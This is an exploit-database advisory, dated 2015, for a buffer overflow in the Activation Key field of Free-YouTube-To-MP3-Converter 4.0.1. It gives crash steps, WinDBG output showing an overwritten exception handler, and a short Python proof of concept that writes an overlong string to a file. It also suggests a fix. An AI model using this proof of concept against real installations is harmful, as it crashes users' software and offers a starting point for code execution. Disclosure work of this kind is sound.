Free-YouTube-To-MP3-Converter 4.0.1 - Buffer Overflow Vulnerability

2015-10-10T00:00:00
ID 1337DAY-ID-24393
Type zdt
Reporter ZwX
Modified 2015-10-10T00:00:00

Description

FreeYouTubeToMP3 Converter version 4.0.1 suffers from a buffer overflow vulnerability.

                                        
                                            -----------------------------------------------------
  Exploit Title : Free-YouTube-To-MP3-Converter - Buffer Overflow Vulnerability
  Date : 28/09/2015
  Exploit Author :  ZwX
  Software Vendor : https://www.dvdvideosoft.com
  Software Link: http://apps.dvdvideosoft.com/fr/downloadSource/FreeYouTubeToMP3Converter.exe
  Version: 4.0.1
  Tested on: Windows 7 
 -----------------------------------------------------

 ---------------------------
 * Solution - Fix & Patch: *
 ---------------------------

 - Restrict the number of characters in input Activation Key.

 --------------------------------
  * Steps to Produce the Crash: *
 --------------------------------

 - 1. Execute Free-YouTube-To-MP3-Converter.exe
 - 2. Copy  the AAAA...string from bof.txt to clipboard
 - 3. Go Menu -> Tools -> Options
 - 4. Paste it the input Activation Key AAAA....string click Activate
 - 5. Software will Crash.

 --------------------------------
 * Crash Analysis using WinDBG: *
 --------------------------------

 Access violation - code c0000005 (!!! second chance !!!)
 eax=00316a30 ebx=41414141 ecx=41414141 edx=00000000 esi=00316a30 edi=00000000
 eip=779071b4 esp=003169cc ebp=00316a1c iopl=0         nv up ei pl nz na po nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
 ntdll!KiFastSystemCallRet:
 779071b4 c3              ret
 0:000> !exchain
 00319484: 41414141
 Invalid exception stack at 41414141
 0:000> d 00319484
 00319484  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 00319494  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 003194a4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 003194b4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 003194c4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 003194d4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 003194e4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 003194f4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 0:000> kb
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
001e6a5c 776db2e6 001e6a70 001e6ac0 00000000 ntdll!KiFastSystemCallRet
001e6d90 776b0844 41414141 fffffffe fffffffe ntdll!RtlRemoteCall+0x236
001e6de0 7763f9be 41414141 0000004d 001e94b4 ntdll!EtwSetMark+0x14bea
001e6e60 77667117 001e6e78 001e6e94 001e6e78 ntdll!RtlGetGroupSecurityDescriptor+0x2b2
001e9334 41414141 41414141 41414141 41414141 ntdll!KiUserExceptionDispatcher+0xf
001e9338 41414141 41414141 41414141 41414141 0x41414141

 ------------------------
   * Proof Of Concept *
 ------------------------
 
 buffer = "\x41"*8538
 seh = "\x42"*12
  
 file = open("bof.txt","w")
 file.write(buffer+seh)
 file.close()
 
 print "POC Created by ZwX"
 print " Email: [email protected]"

#  0day.today [2018-02-16]  #